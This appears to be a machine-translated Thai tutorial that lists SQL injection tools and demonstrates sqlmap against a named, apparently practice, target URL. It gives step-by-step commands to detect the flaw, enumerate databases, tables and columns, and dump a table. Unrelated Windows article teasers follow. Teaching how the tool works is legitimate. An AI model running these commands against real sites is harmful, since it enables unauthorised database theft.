Web6: SQL Injection - เครื่องมือการหาประโยชน์บางอย่าง

Web6: SQL Injection - เครื่องมือการหาประโยชน์บางอย่าง

ในส่วนนี้ LuckyTemplates จะแนะนำเครื่องมือบางอย่างที่ใช้ในการใช้ประโยชน์จากSQL Injection

ปัจจุบันมีเครื่องมือสแกนช่องโหว่ด้านความปลอดภัยมากมาย (รวมถึงการแทรก SQL) เครื่องมือเหล่านี้ช่วยให้สามารถตรวจจับและใช้ประโยชน์จากช่องโหว่ของการแทรก SQL ได้ค่อนข้างแข็งแกร่ง เครื่องมือหาประโยชน์จากช่องโหว่การฉีด SQL อัตโนมัติที่ใช้กันทั่วไปบางส่วน ได้แก่:

  • ตารางฐานข้อมูล
  • The Mole (ขุดข้อมูลของคุณ)
  • ฮาวีจ

นอกจากนี้ยังมีเครื่องมืออื่นๆ ที่คุณสามารถอ้างอิงได้ เช่น Netsparker, jSQL Injection, Burp, BBQSQL...

ด้านล่างนี้เป็นการสาธิตการใช้ Sqlmap เพื่อใช้ประโยชน์จากการฉีด SQL พื้นฐาน

คุณดาวน์โหลด Sqlmap ได้ที่ http://sqlmap.org/

Sqlmap เขียนด้วยภาษา Python ดังนั้นหากต้องการใช้เครื่องมือนี้ คุณจะต้องติดตั้ง Python คุณสามารถดาวน์โหลด python ได้ที่ http://www.python.org/downloads/

ก่อนอื่น คุณต้องระบุเว็บไซต์เป้าหมาย ที่นี่ฉันมีเป้าหมายต่อไปนี้: http://zerocoolhf.altervista.org/level1.php?id=1 (หน้านี้ปิดให้บริการแล้ว)

ขั้นตอนที่ 1 : เปิด cmd แล้วพิมพ์คำสั่งต่อไปนี้:

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”

Web6: SQL Injection - เครื่องมือการหาประโยชน์บางอย่าง

sqlmap จะตรวจจับช่องโหว่ของเป้าหมายและให้ข้อมูลเกี่ยวกับช่องโหว่

ขั้นตอนที่ 2 : เมื่อเราพิจารณาแล้วว่าเว็บไซต์เป้าหมายมีช่องโหว่ในการแทรก SQL เราจะดำเนินการค้นหาชื่อฐานข้อมูลต่อไป

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs

Web6: SQL Injection - เครื่องมือการหาประโยชน์บางอย่าง

=> ฐานข้อมูล: my_zerocoolhf

ขั้นตอนที่ 3 : หลังจากกำหนดชื่อฐานข้อมูลแล้ว เราจะดำเนินการค้นหาชื่อของตารางในฐานข้อมูลต่อไป

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf

Web6: SQL Injection - เครื่องมือการหาประโยชน์บางอย่าง

=> มี 2 ตารางในฐานข้อมูล: auth และ book

ขั้นตอนที่ 4 : กำหนดชื่อของคอลัมน์ในตาราง

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book

Web6: SQL Injection - เครื่องมือการหาประโยชน์บางอย่าง

=> ระบุคอลัมน์ในตารางหนังสือ: ผู้แต่ง, รหัส, ราคา, ชื่อเรื่อง

ขั้นตอนที่ 5 : ดัมพ์ข้อมูลจากตาราง

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book

Web6: SQL Injection - เครื่องมือการหาประโยชน์บางอย่าง

=> เราก็ได้ฐานข้อมูลของเว็บไซต์เป้าหมายแล้ว

ด้านบนเป็นการสาธิตพื้นฐานของการใช้ sqlmap เพื่อใช้ประโยชน์จากข้อผิดพลาดในการฉีด SQL คุณสามารถเรียนรู้เพิ่มเติมเกี่ยวกับตัวเลือก sqlmap ได้ที่ https://github.com/sqlmapproject/sqlmap/wiki/Usage เพื่อรองรับการหาประโยชน์ การหาประโยชน์จากการฉีด SQL


วิธีย่อขนาดหน้าจอใน Windows 10

วิธีย่อขนาดหน้าจอใน Windows 10

บทความนี้จะแสดงวิธีย่อขนาดหน้าจอใน Windows 10 เพื่อให้คุณใช้งานได้อย่างมีประสิทธิภาพ

วิธีปิด (หรือเปิด) Xbox Game Bar บน Windows 10

วิธีปิด (หรือเปิด) Xbox Game Bar บน Windows 10

Xbox Game Bar เป็นเครื่องมือสนับสนุนที่ยอดเยี่ยมที่ Microsoft ติดตั้งบน Windows 10 ซึ่งผู้ใช้สามารถเรียนรู้วิธีเปิดหรือปิดได้อย่างง่ายดาย

5 วิธีในการจดบันทึกบน Windows 11 โดยไม่ต้องดาวน์โหลดซอฟต์แวร์

5 วิธีในการจดบันทึกบน Windows 11 โดยไม่ต้องดาวน์โหลดซอฟต์แวร์

หากความจำของคุณไม่ค่อยดี คุณสามารถใช้เครื่องมือเหล่านี้เพื่อเตือนตัวเองถึงสิ่งสำคัญขณะทำงานได้

วิธีนำแอพพลิเคชั่นไปไว้บนหน้าจอคอมพิวเตอร์ Windows 11

วิธีนำแอพพลิเคชั่นไปไว้บนหน้าจอคอมพิวเตอร์ Windows 11

หากคุณคุ้นเคยกับ Windows 10 หรือเวอร์ชันก่อนหน้า คุณอาจประสบปัญหาในการนำแอปพลิเคชันไปยังหน้าจอคอมพิวเตอร์ของคุณในอินเทอร์เฟซ Windows 11 ใหม่ มาทำความรู้จักกับวิธีการง่ายๆ เพื่อเพิ่มแอพพลิเคชั่นลงในเดสก์ท็อปของคุณ

วิธีถอนการติดตั้งไดรเวอร์บน Windows อย่างสมบูรณ์

วิธีถอนการติดตั้งไดรเวอร์บน Windows อย่างสมบูรณ์

เพื่อหลีกเลี่ยงปัญหาและข้อผิดพลาดหน้าจอสีน้ำเงิน คุณต้องลบไดรเวอร์ที่ผิดพลาดซึ่งเป็นสาเหตุของปัญหาออก บทความนี้จะแนะนำวิธีถอนการติดตั้งไดรเวอร์บน Windows โดยสมบูรณ์

วิธีเปิดใช้งานแป้นพิมพ์เสมือน/แป้นพิมพ์สัมผัสบน Windows 11

วิธีเปิดใช้งานแป้นพิมพ์เสมือน/แป้นพิมพ์สัมผัสบน Windows 11

เรียนรู้วิธีเปิดใช้งานแป้นพิมพ์เสมือนบน Windows 11 เพื่อเพิ่มความสะดวกในการใช้งาน ผสานเทคโนโลยีใหม่เพื่อประสบการณ์ที่ดียิ่งขึ้น

วิธีใช้ AdLock เพื่อบล็อกโฆษณาบนคอมพิวเตอร์ของคุณ

วิธีใช้ AdLock เพื่อบล็อกโฆษณาบนคอมพิวเตอร์ของคุณ

เรียนรู้การติดตั้งและใช้ AdLock เพื่อบล็อกโฆษณาบนคอมพิวเตอร์ของคุณอย่างมีประสิทธิภาพและง่ายดาย

หนอนคืออะไร? เหตุใดจึงเป็นอันตรายต่อคอมพิวเตอร์?

หนอนคืออะไร? เหตุใดจึงเป็นอันตรายต่อคอมพิวเตอร์?

เวิร์มคอมพิวเตอร์คือโปรแกรมมัลแวร์ประเภทหนึ่งที่มีหน้าที่หลักคือการแพร่ไวรัสไปยังคอมพิวเตอร์เครื่องอื่นในขณะที่ยังคงทำงานอยู่บนระบบที่ติดไวรัส

วิธีดาวน์โหลด อัปเดต และแก้ไขปัญหาไดรเวอร์ USB บน Windows 10

วิธีดาวน์โหลด อัปเดต และแก้ไขปัญหาไดรเวอร์ USB บน Windows 10

เรียนรู้วิธีดาวน์โหลดและอัปเดตไดรเวอร์ USB บนอุปกรณ์ Windows 10 เพื่อให้ทำงานได้อย่างราบรื่นและมีประสิทธิภาพ

5 วิธีในการปรับแต่ง Xbox Game Bar บน Windows PC

5 วิธีในการปรับแต่ง Xbox Game Bar บน Windows PC

หากคุณต้องการเรียนรู้เพิ่มเติมเกี่ยวกับ Xbox Game Bar และวิธีปรับแต่งให้เหมาะกับประสบการณ์การเล่นเกมที่สมบูรณ์แบบของคุณ บทความนี้มีข้อมูลทั้งหมด